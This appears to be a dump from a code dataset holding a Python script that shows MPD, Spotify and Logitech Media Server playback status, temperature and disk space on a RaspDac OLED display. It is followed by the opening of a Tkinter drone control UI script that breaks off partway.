source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
RaspDacDisplay.py
|
import Winstar_GraphicOLED
import moment
import time
import json
import logging
import subprocess
import os
from mpd import MPDClient
import pylms
from pylms import server
import telnetlib
from socket import error as socket_error
try:
import RPi.GPIO as GPIO
DISPLAY_INSTALLED = True
print("Gpio module installed")
time.sleep(5)
except:
import curses
DISPLAY_INSTALLED = False
print("Gpio module not installed")
time.sleep(5)
import queue as Queue
from threading import Thread
import signal
import sys
# import page definitions from pages.py
import pages
STARTUP_MSG = "Raspdac\nStarting"
HESITATION_TIME = 2.5 # Amount of time in seconds to hesistate before scrolling
ANIMATION_SMOOTHING = .15 # Amount of time in seconds before repainting display
COOLING_PERIOD = 15 # Default amount of time in seconds before an alert message can be redisplayed
# The Winstar display shipped with the RaspDac is capable of two lines of display
# when the 5x8 font is used. This code assumes that is what you will be using.
# The display logic would need significant rework to support a different number
# of display lines!
DISPLAY_WIDTH = 16 # the character width of the display
DISPLAY_HEIGHT = 2 # the number of lines on the display
# This is where the log file will be written
LOGFILE = '/var/log/RaspDacDisplay.log'
# LOGFILE='./log/RaspDacDisplay.log'
STATUSLOGFILE = '/var/log/RaspDacDisplayStatus.log'
# STATUSLOGFILE='./log/RaspDacDisplayStatus.log'
STATUSLOGGING = False
# Adjust this setting to localize the time display to your region
# TIMEZONE="US/Eastern"
TIME24HOUR = True
TIMEZONE = "Europe/Kiev"
# Logging level
LOGLEVEL = logging.DEBUG
# LOGLEVEL=logging.INFO
# LOGLEVEL=logging.WARNING
# LOGLEVEL=logging.CRITICAL
# Configure which music services to monitor
# For Volumio and RuneAudio MPD and SPOP should be enabled and LMS disabled
# for Max2Play if you are using the Logitech Music Service, then LMS should be enabled
MPD_ENABLED = True
MPD_SERVER = "localhost"
MPD_PORT = 6600
SPOP_ENABLED = False
SPOP_SERVER = "localhost"
SPOP_PORT = 6602
LMS_ENABLED = False
LMS_SERVER = "localhost"
LMS_PORT = 9090
LMS_USER = ""
LMS_PASSWORD = ""
# Set this to MAC address of the Player you want to monitor.
# THis should be the MAC of the RaspDac system if using Max2Play with SqueezePlayer
# Note: if you have another Logitech Media Server running in your network, it is entirely
# possible that your player has decided to join it, instead of the LMS on Max2Play
# To fix this, go to the SqueezeServer interface and change move the player to the
# correct server.
LMS_PLAYER = "00:01:02:aa:bb:cc"
# If you are using RuneAudio you can pull the information from the REDIS database that RuneAudio maintains
# RUNE_ENABLED = False
# REDIS_SERVER = "localhost"
# REDIS_PORT = 6379
# REDIS_PASSWORD = ""
class RaspDac_Display:
def __init__(self):
logging.debug("RaspDac_Display Initializing")
self.tempreadexpired = 0
self.diskreadexpired = 0
self.ratereadexpired = 0
# used with Redis to try to figure out how long the song has been playing
self.timesongstarted = 0
self.currentsong = ""
self.currentelapsed = 0
self.tempc = 0.0
self.tempf = 0.0
self.avail = 0
self.availp = 0
self.rate = 0
# Initilize the connections to the music Daemons. Currently supporting
# MPD and SPOP (for Spotify)
ATTEMPTS = 3
# Will try to connect multiple times
if MPD_ENABLED:
for i in range(1, ATTEMPTS):
self.client = MPDClient()
try:
# Connect to the MPD daemon
self.client.connect(MPD_SERVER, MPD_PORT)
break
except:
time.sleep(2)
else:
# After the alloted number of attempts did not succeed in connecting
logging.warning("Unable to connect to MPD service on startup")
if SPOP_ENABLED:
# Now attempting to connect to the Spotify daemon
# This may fail if Spotify is not configured. That's ok!
for i in range(1, ATTEMPTS):
try:
self.spotclient = telnetlib.Telnet(SPOP_SERVER, SPOP_PORT)
self.spotclient.read_until("\n".encode("utf-8"))
break
except:
time.sleep(2)
else:
# After the alloted number of attempts did not succeed in connecting
logging.warning("Unable to connect to Spotify service on startup")
if LMS_ENABLED:
for i in range(1, ATTEMPTS):
try:
# Connect to the LMS daemon
self.lmsserver = pylms.server.Server(LMS_SERVER, LMS_PORT, LMS_USER, LMS_PASSWORD)
self.lmsserver.connect()
# Find correct player
players = self.lmsserver.get_players()
for p in players:
### Need to find out how to get the MAC address from player
if p.get_ref().lower() == LMS_PLAYER.lower():
self.lmsplayer = p
break
if self.lmsplayer is None:
self.lmsplayer = self.lmsserver.get_players()[0]
if self.lmsplayer is None:
raise Exception('Could not find any LMS player')
break
except (socket_error, AttributeError, IndexError):
logging.debug("Connect attempt {0} to LMS server failed".format(i))
time.sleep(2)
else:
# After the alloted number of attempts did not succeed in connecting
logging.warning("Unable to connect to LMS service on startup")
global STATUSLOGGING
if STATUSLOGGING:
try:
self.statusfile = open(STATUSLOGFILE, 'a')
except:
logging.warning("Status data logging requested but could not open {0}".format(STATUSLOGFILE))
STATUSLOGGING = False
def status_mpd(self):
# Try to get status from MPD daemon
try:
m_status = self.client.status()
m_currentsong = self.client.currentsong()
playlist_info = self.client.playlistinfo()
except:
# Attempt to reestablish connection to daemon
try:
self.client.connect(MPD_SERVER, MPD_PORT)
m_status = self.client.status()
m_currentsong = self.client.currentsong()
playlist_info = self.client.playlistinfo()
except:
logging.debug("Could not get status from MPD daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'current': 0, 'remaining': u"",
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
print("mpd status:", m_status)
state = m_status.get('state')
if state == "play":
artist = m_currentsong.get('artist')
name = m_currentsong.get('name')
# Trying to have something to display. If artist is empty, try the
# name field instead.
if artist is None:
artist = name
title = m_currentsong.get('title')
album = m_currentsong.get('album')
playlist_position = int(m_status.get('song')) + 1
playlist_count = int(m_status.get('playlistlength'))
volume = int(m_status.get('volume', 0))
# MPDs rate data changes continuously.
# To prevent the screen from unnecessarily refreshing limit updates to every 20 seconds
if self.ratereadexpired < time.time():
self.ratereadexpired = time.time() + 20
self.bitrate = "{0} kbps".format(m_status.get('bitrate'))
try:
audio = m_status['audio'].split(':')
if len(audio) == 3:
sample = round(float(audio[0]) / 1000, 1)
bits = audio[1]
if audio[2] == '1':
channels = 'Mono'
elif audio[2] == '2':
channels = 'Stereo'
elif int(audio[2]) > 2:
channels = 'Multi'
else:
channels = u""
if channels == u"":
tracktype = "{0} bit, {1} kHz".format(bits, sample)
else:
tracktype = "{0}, {1} bit, {2} kHz".format(channels, bits, sample)
else:
# If audio information not available just send that MPD is the source
tracktype = u"MPD"
except KeyError:
tracktype = u""
(current, duration) = (m_status.get('time').split(":"))
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if self.bitrate is None: self.bitrate = u""
if tracktype is None: tracktype = u""
if duration is None: duration = 0
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
# If playlist is length 1 and the song playing is from an http source it is streaming
if playlist_count == 1:
if playlist_info[0]['file'][:4] == "http":
playlist_display = "Streaming"
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': self.bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': u"",
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status_spop(self):
# Try to get status from SPOP daemon
try:
self.spotclient.write("status\n".encode("utf-8"))
spot_status_string = self.spotclient.read_until("}".encode("utf-8")).strip()
except:
# Try to reestablish connection to daemon
try:
self.spotclient = telnetlib.Telnet(SPOP_SERVER, SPOP_PORT)
self.spotclient.read_until("\n".encode("utf-8"))
self.spotclient.write("status\n".encode("utf-8"))
spot_status_string = self.spotclient.read_until("}".encode("utf-8")).strip()
except:
logging.debug("Could not get status from SPOP daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'current': 0, 'remaining': u"",
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
spot_status = json.loads(spot_status_string)
if spot_status.get('status') == "playing":
artist = spot_status.get('artist')
title = spot_status.get('title')
album = spot_status.get('album')
current = spot_status.get('position')
duration = spot_status.get('duration')
playlist_position = spot_status.get('current_track')
playlist_count = spot_status.get('total_tracks')
# SPOP doesn't seem to have bitrate, track type, or volume available
bitrate = u""
tracktype = u""
volume = 0
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if bitrate is None: bitrate = u""
if tracktype is None: tracktype = u""
if duration is None:
duration = 0
else:
# The spotify client returns time in 1000's of a second
# Need to adjust to seconds to be consistent with MPD
duration = duration / 1000
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status_lms(self):
# Try to get status from LMS daemon
try:
lms_status = self.lmsplayer.get_mode()
except:
# Try to reestablish connection to daemon
try:
self.lmsserver = pylms.server.Server(LMS_SERVER, LMS_PORT, LMS_USER, LMS_PASSWORD)
self.lmsserver.connect()
# Find correct player
players = self.lmsserver.get_players()
for p in players:
### Need to find out how to get the MAC address from player
if p.get_ref().lower() == LMS_PLAYER.lower():
self.lmsplayer = p
break
if self.lmsplayer is None:
self.lmsplayer = self.lmsserver.get_players()[0]
if self.lmsplayer is None:
raise Exception('Could not find any LMS player')
lms_status = self.lmsplayer.get_mode()
except (socket_error, AttributeError, IndexError):
logging.debug("Could not get status from LMS daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u"", 'current_time': u""}
if lms_status == "play":
import urllib
artist = urllib.unquote(str(self.lmsplayer.request("artist ?", True))).decode('utf-8')
title = urllib.unquote(str(self.lmsplayer.request("title ?", True))).decode('utf-8')
album = urllib.unquote(str(self.lmsplayer.request("album ?", True))).decode('utf-8')
playlist_position = int(self.lmsplayer.request("playlist index ?")) + 1
playlist_count = self.lmsplayer.playlist_track_count()
volume = self.lmsplayer.get_volume()
current = self.lmsplayer.get_time_elapsed()
duration = self.lmsplayer.get_track_duration()
url = self.lmsplayer.get_track_path()
# Get bitrate and tracktype if they are available. Try blocks used to prevent array out of bounds exception if values are not found
try:
bitrate = \
urllib.unquote(str(self.lmsplayer.request("songinfo 2 1 url:" + url + " tags:r", True))).decode(
'utf-8').split("bitrate:", 1)[1]
except:
bitrate = u""
try:
tracktype = \
urllib.unquote(str(self.lmsplayer.request("songinfo 2 1 url:" + url + " tags:o", True))).decode(
'utf-8').split("type:", 1)[1]
except:
tracktype = u""
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
# If the track count is greater than 1, we are playing from a playlist and can display track position and track count
if self.lmsplayer.playlist_track_count() > 1:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
# if the track count is exactly 1, this is either a short playlist or it is streaming
elif self.lmsplayer.playlist_track_count() == 1:
try:
# if streaming
if self.lmsplayer.playlist_get_info()[0]['duration'] == 0.0:
playlist_display = "Streaming"
# it really is a short playlist
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
except KeyError:
logging.debug("In LMS couldn't get valid track information")
playlist_display = u""
else:
logging.debug("In LMS track length is <= 0")
playlist_display = u""
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if bitrate is None: bitrate = u""
if tracktype is None: tracktype = u""
if duration is None: duration = 0
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status(self):
# If you are using Rune
if MPD_ENABLED or SPOP_ENABLED or LMS_ENABLED:
if MPD_ENABLED:
# Try MPD daemon
status = self.status_mpd()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
# If MPD is stopped
if status.get('state') != "play":
# Try SPOP
if SPOP_ENABLED:
status = self.status_spop()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"",
'current': 0, 'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"",
'playlist_position': 0, 'playlist_count': 0, 'bitrate': u"", 'type': u""}
# If SPOP is stopped
if status.get('state') != "play":
# Try LMS
if LMS_ENABLED:
status = self.status_lms()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"",
'current': 0, 'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"",
'playlist_position': 0, 'playlist_count': 0, 'bitrate': u"", 'type': u""}
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
# Add system variables
try:
if TIME24HOUR == True:
current_time = moment.utcnow().timezone(TIMEZONE).strftime("%H:%M").strip()
current_time_sec = moment.utcnow().timezone(TIMEZONE).strftime("%H:%M:%S").strip()
else:
current_time = moment.utcnow().timezone(TIMEZONE).strftime("%-I:%M %p").strip()
current_time_sec = moment.utcnow().timezone(TIMEZONE).strftime("%-I:%M:%S %p").strip()
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = "00:00"
current_time_sec = "00:00:00"
current_ip = subprocess.getoutput("ip -4 route get 1 | head -1 | cut -d' ' -f7 | tr -d '\n'").strip()
# Read Temperature from Pi's on-board temperature sensor once every 20 seconds
if self.tempreadexpired < time.time():
self.tempreadexpired = time.time() + 20
try:
file = open("/sys/class/thermal/thermal_zone0/temp")
self.tempc = int(file.read())
# Convert value to float and correct decimal place
self.tempc = round(float(self.tempc) / 1000, 1)
# convert to fahrenheit
self.tempf = round(self.tempc * 9 / 5 + 32, 1)
file.close()
except IOError:
self.tempc = 0.0
self.tempf = 0.0
except AttributeError:
file.close()
self.tempc = 0.0
self.tempf = 0.0
# Read available disk space remaining every 20 seconds
if self.diskreadexpired < time.time():
self.diskreadexpired = time.time() + 20
try:
# Check if running on OSX. If yes, adjust df command
if sys.platform == "darwin":
p = os.popen("df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
else:
# assume running on Raspberry linux
p = os.popen("df --output='avail','pcent' /")
line = p.readline()
line = p.readline().strip()
va = line.split()
self.avail = va[0]
self.availp = va[1]
# remove % sign
self.availp = self.availp[0:len(self.availp) - 1]
self.avail = int(self.avail)
self.availp = int(self.availp)
p.close()
except IOError:
self.avail = 0
self.availp = 0
except AttributeError:
p.close()
self.avail = 0
self.availp = 0
status['current_tempc'] = self.tempc
status['current_tempf'] = self.tempf
status['disk_avail'] = self.avail
status['disk_availp'] = self.availp
status['current_time'] = current_time
status['current_time_sec'] = current_time
status['current_ip'] = current_ip
# if logging of the status data has been requested record the current status
if STATUSLOGGING:
self.statusfile.write(str(status) + '\n')
self.statusfile.flush()
return status
def Display(q, l, c):
# q - Queue to receive updates from
# l - number of lines in display
# c - number of columns in display
lines = []
columns = []
lcd = Winstar_GraphicOLED.Winstar_GraphicOLED()
lcd.oledReset()
lcd.home()
lcd.clear()
lcd.message(STARTUP_MSG)
time.sleep(2)
for i in range(0, l):
lines.append("")
columns.append(0)
# Get first display update off of the queue
item = q.get()
q.task_done()
lcd.home()
lcd.clear()
for i in range(len(item)):
# Convert from Unicode to UTF-8
lines[i] = item[i]
lcd.setCursor(0, i)
lcd.message(lines[i][0:c])
prev_time = time.time()
while True:
short_lines = True
# Smooth animation
if time.time() - prev_time < ANIMATION_SMOOTHING:
time.sleep(ANIMATION_SMOOTHING - (time.time() - prev_time))
try:
# Determine if any lines have been updated and if yes display them
for i in range(len(item)):
# Convert from Unicode into UTF-8
# item[i] = item[i].encode("utf-8")
# Check if line is longer than display
if len(item[i]) > c:
short_lines = False
# Check if line has been updated
if lines[i] != item[i]:
# Create a line to print that is at least as long as the existing line
# This is to erase any extraneous characters on the display
buf = item[i].ljust(len(lines[i]))
# Reset cursor to beginning of changed line and then display the change
lcd.setCursor(0, i)
lcd.message(buf[0:c])
# Update the local line data and reset the column position for the line
lines[i] = item[i]
columns[i] = 0
# If lines all fit on display then we can wait for new input
if short_lines:
item = q.get()
q.task_done()
else:
# Update all long lines
for i in range(len(lines)):
if len(lines[i]) > c:
buf = "%s %s" % (lines[i], lines[i][0:DISPLAY_WIDTH - 1])
# buf = "{} {}".format(lines[i],lines[i][0:DISPLAY_WIDTH-1])
# buf = lines[i]+" "+lines[i][0:c]
columns[i] = columns[i] + 1
if columns[i] > len(buf) - c:
columns[i] = 0
lcd.setCursor(0, i)
# Print the portion of the string that is currently visible
lcd.message(buf[columns[i]:columns[i] + c])
# Since we have to continue updating the display, check for a new update but don't block
item = q.get_nowait()
q.task_done()
prev_time = time.time()
except Queue.Empty:
prev_time = time.time()
pass
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGTERM, sigterm_handler)
try:
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=LOGFILE, level=LOGLEVEL)
except IOError:
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename="RaspDacDisplay.log",
level=LOGLEVEL)
# As cstatus will get referenced inside of handlecaughtexceptions, make sure it has a valid value
cstatus = {}
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logging.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
if len(cstatus) > 0:
logging.error("Player status at exception")
logging.error(str(cstatus))
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
logging.info("Raspdac display starting...")
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger("mpd")
loggingMPD.setLevel(logging.WARN)
try:
dq = Queue.Queue() # Create display Queue
dm = Thread(target=Display, args=(dq, DISPLAY_HEIGHT, DISPLAY_WIDTH))
dm.setDaemon(True)
dm.start()
rd = RaspDac_Display()
except:
# e = sys.exc_info()[0]
# logging.critical("Received exception: %s" % e)
# e = sys.exc_info()[0]
logging.critical("Unable to initialize RaspDac Display. Exiting...")
logging.critical("Exception", exc_info=(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))
if DISPLAY_INSTALLED:
GPIO.cleanup()
else:
curses.endwin()
sys.exit(0)
try:
current_page_number = -1
current_line_number = 0
page_expires = 0
hesitation_expires = 0
curlines = []
hesitate_expires = []
alert_mode = False
# Reset all of the alert message cooling values
for pl in pages.ALERT_LIST:
pl['cooling_expires'] = 0
# Initialize previous state
prev_state = rd.status()
# Force the system to recognize the start state as a change
prev_state['state'] = ""
while True:
# Get current state of the player
cstatus = rd.status()
state = cstatus.get('state')
alert_check = False
# Check to see if any alerts are triggered
for pl in pages.ALERT_LIST:
# Check to see if alert is in its cooling period
if pl['cooling_expires'] < time.time():
# Use try block to skip page if variables are missing
try:
# Check to see what type of monitoring to perform
if pl['alert']['type'] == "change":
if cstatus[pl['alert']['variable']] != prev_state[pl['alert']['variable']]:
prev_state[pl['alert']['variable']] = cstatus[pl['alert']['variable']]
# Some state changes cause variable changes like volume
# Check to see if these dependent variable changes
# should be suppressed
try:
if prev_state['state'] == state or not pl['alert']['suppressonstatechange']:
alert_check = True
except KeyError:
pass
elif pl['alert']['type'] == "above":
if cstatus[pl['alert']['variable']] > pl['alert']['values'][0]:
alert_check = True
elif pl['alert']['type'] == "below":
if cstatus[pl['alert']['variable']] < pl['alert']['values'][0]:
alert_check = True
elif pl['alert']['type'] == "range":
if cstatus[pl['alert']['variable']] > pl['alert']['values'][0] and cstatus[
pl['alert']['variable']] < pl['alert']['values'][1]:
alert_check = True
if alert_check:
alert_mode = True
# Set current_pages to the alert page
current_pages = pl
current_page_number = 0
current_line_number = 0
page_expires = time.time() + current_pages['pages'][current_page_number]['duration']
curlines = []
hesitate_expires = []
# Set cooling expiry time. If not coolingperiod directive, use default
try:
pl['cooling_expires'] = time.time() + pl['alert']['coolingperiod']
except KeyError:
pl['cooling_expires'] = time.time() + COOLING_PERIOD
# if an alert has been found, break out of the loop
# this has the effect of making the order of the list the priority of the messages
break
except (KeyError, AttributeError, IndexError):
pass
# Set interruptible value. If value not present, set to default value of True
try:
# interruptible is only an override until the page expires. If page expires, allow page updates to continue.
if page_expires < time.time():
interruptible = True
# if page just expired on an alert page then force restore to current play state
if alert_mode:
alert_mode = False
prev_state['state'] = ""
else:
interruptible = current_pages['interruptible']
except KeyError:
interruptible = True
# check to see if we need to change the display to something new
if (alert_mode or state != prev_state['state']) and interruptible:
current_page_number = -1
current_line_number = 0
page_expires = 0
curlines = []
hesitate_expires = []
# if change caused by state change and not alert
if alert_mode == False:
prev_state['state'] = state
# Set to new display page
if state != "play":
current_pages = pages.PAGES_Stop
# else display the PAGES_Playing pages
else:
current_pages = pages.PAGES_Play
# if page has expired then move to the next page
if page_expires < time.time():
# Move to next page and check to see if it should be displayed or hidden
for i in range(len(current_pages['pages'])):
current_page_number = current_page_number + 1
# if on last page, return to first page
if current_page_number > len(current_pages['pages']) - 1:
current_page_number = 0
page_expires = time.time() + current_pages['pages'][current_page_number]['duration']
cp = current_pages['pages'][current_page_number]
try:
hwe = cp['hidewhenempty']
except KeyError:
hwe = 'False'
try:
hwp = cp['hidewhenpresent']
except:
hwp = 'False'
# to prevent old pages format from causing problems, convert values to strings
if type(hwe) is bool:
hwe = str(hwe)
if type(hwp) is bool:
hwp = str(hwp)
if hwe.lower() == 'all' or hwe.lower() == 'true':
allempty = True
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is not empty, then set allempty False and exit loop
if len(cstatus[v]) > 0:
allempty = False
break
elif type(cstatus[v]) is int:
if not cstatus[v] == 0:
allempty = False
break
else:
# All other variable types are considered not empty
allempty = False
break
except KeyError:
# if the variable is not in cstatus consider it empty
pass
if not allempty:
break
elif hwe.lower() == 'any':
anyempty = False
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is empty, then set anyempty True and exit loop
if len(cstatus[v]) == 0:
anyempty = True
break
# if the value is 0 consider it empty
elif type(cstatus[v]) is int:
if cstatus[v] == 0:
anyempty = True
break
except KeyError:
# if the variable is not in cstatus consider it empty
anyempty = True
break
if not anyempty:
break
elif hwp.lower() == 'any':
anypresent = False
try:
hvars = cp['hidewhenpresentvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is present, then set anypresent True and exit loop
if len(cstatus[v]) > 0:
anypresent = True
break
elif type(cstatus[v]) is int:
if not cstatus[v] == 0:
anypresent = True
break
# if it is not a string, and not zero consider it present
else:
anypresent = True
break
except KeyError:
# if the variable is not in cstatus consider it empty
break
if not anypresent:
break
elif hwp.lower() == 'all' or hwp.lower() == 'true':
allpresent = True
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is not present, then set allpresent False and exit loop
if len(cstatus[v]) == 0:
allpresent = False
break
elif type(cstatus[v]) is int:
if cstatus[v] == 0:
allpresent = False
break
except KeyError:
# if the variable is not in cstatus consider it empty
allpresent = False
break
if not allpresent:
break
else:
# If not hidewhenempty or hidewhenpresent then exit loop
break
# Set current_page
current_page = current_pages['pages'][current_page_number]
# Now display the lines from the current page
lines = []
for i in range(len(current_page['lines'])):
# make sure curlines is big enough. curlines is used to detect when the display has changed
# if not expanded here it will cause an IndexError later if it has not already been initialized
while len(curlines) < len(current_page['lines']):
curlines.append("")
# make sure hesitate_expires is big enough as well
while len(hesitate_expires) < len(current_page['lines']):
hesitate_expires.append(0)
current_line = current_page['lines'][i]
try:
justification = current_line['justification']
except KeyError:
justification = "left"
try:
scroll = current_line['scroll']
except KeyError:
scroll = False
try:
variables = current_line['variables']
except KeyError:
variables = []
# If you have specified a strftime format on the line
# now use it to add a formatted time to cstatus
try:
strftime = current_line['strftime']
except:
# Use 12 hour clock as default
strftime = "%-I:%M %p"
cstatus['current_time_formatted'] = moment.utcnow().timezone(TIMEZONE).strftime(strftime).strip()
format = current_line['format']
# Get paramaters
# ignore KeyError exceptions if variable is unavailable
parms = []
try:
for j in range(len(current_line['variables'])):
try:
parms.append(cstatus[current_line['variables'][j]])
# if type(cstatus[current_line['variables'][j]]) is str:
# parms.append(cstatus[current_line['variables'][j]].encode('utf-8'))
# else:
# parms.append(cstatus[current_line['variables'][j]])
except KeyError:
pass
except KeyError:
pass
# create line to display
line = format.format(*parms)#.decode('utf-8')
# justify line
try:
if current_line['justification'] == "center":
line = "{0:^{1}}".format(line, DISPLAY_WIDTH)
elif current_line['justification'] == "right":
line = "{0:>{1}}".format(line, DISPLAY_WIDTH)
except KeyError:
pass
lines.append(line)
# determine whether to scroll or not
# if scroll is false, set hesitation time to large value which
# effectively shuts off the scroll function
if lines[i] != curlines[i]:
curlines[i] = lines[i]
try:
if current_line['scroll']:
hesitate_expires[i] = time.time() + HESITATION_TIME
else:
hesitate_expires[i] = time.time() + 86400 # Do not scroll
except KeyError:
hesitate_expires[i] = time.time() + 86400 # Do not scroll
# Determine if the display should hesitate before scrolling
dispval = []
for i in range(len(lines)):
if hesitate_expires[i] < time.time():
dispval.append(lines[i])
else:
dispval.append(lines[i][0:DISPLAY_WIDTH])
# Send dispval to the queue
dq.put(dispval)
# sleep before next update
time.sleep(.25)
except KeyboardInterrupt:
pass
finally:
dq.put(["Goodbye!", ""])
logging.info("Raspdac display shutting down")
try:
rd.client.disconnect()
except:
pass
try:
rd.spotclient.write("bye\n")
rd.spotclient.close()
except:
pass
if STATUSLOGGING:
rd.statusfile.close()
time.sleep(2)
dq.put(["", ""])
time.sleep(1)
if DISPLAY_INSTALLED:
GPIO.cleanup()
else:
curses.endwin()
|
drone_control_ui.py
|
# This source code is create UI with Tkinter, glue a some components.
import sys
import numpy as np
from PIL import Image
from PIL import ImageTk
import Tkinter as tki
from Tkinter import Toplevel, Scale
import threading
import pytz
import datetime
import cv2
import os
import time
from drone_ar_flight import Drone_AR_Flight
import platform
TIMEZONE = 'Asia/Tokyo'
class DroneUI:
def __init__(self,drone,outputpath):
self.drone = drone
self.ar_cmd = 'MANUAL'
self.ar_val = 0
self.auto_pilot = False
self.takeoff = False
self.distance = 20
self.degree = 10
self.FRAME_W = 960
self.FRAME_H = 720
self.now_battery = int(0)
self.now_height = int(0)
self.drone_ar = Drone_AR_Flight()
self.frame_no = 0
self.frame_lock = threading.Lock()
self.blank_frame = np.zeros((self.FRAME_H, self.FRAME_W, 3), np.uint8)
self.frame = self.blank_frame
self.root = tki.Tk()
self.image = Image.fromarray(self.frame)
self.image = ImageTk.PhotoImage(self.image)
self.panel = tki.Label(image=self.image)
self.panel.image = self.image
self.panel.pack(side="left", padx=10, pady=10)
self.text1 = tki.Label(self.root, text=
'W - Up\t\tArrow U - Forward\n'
'S - Down\t\tArrow D - Backward\n'
'A - Rotate Left\tArrow L - Left\n'
'D - Rotate Right\tArrow R - Right\n',
justify="left")
self.text1.pack(side="top")
self.battery_str = tki.StringVar()
self.battery_str.set('Battery : ')
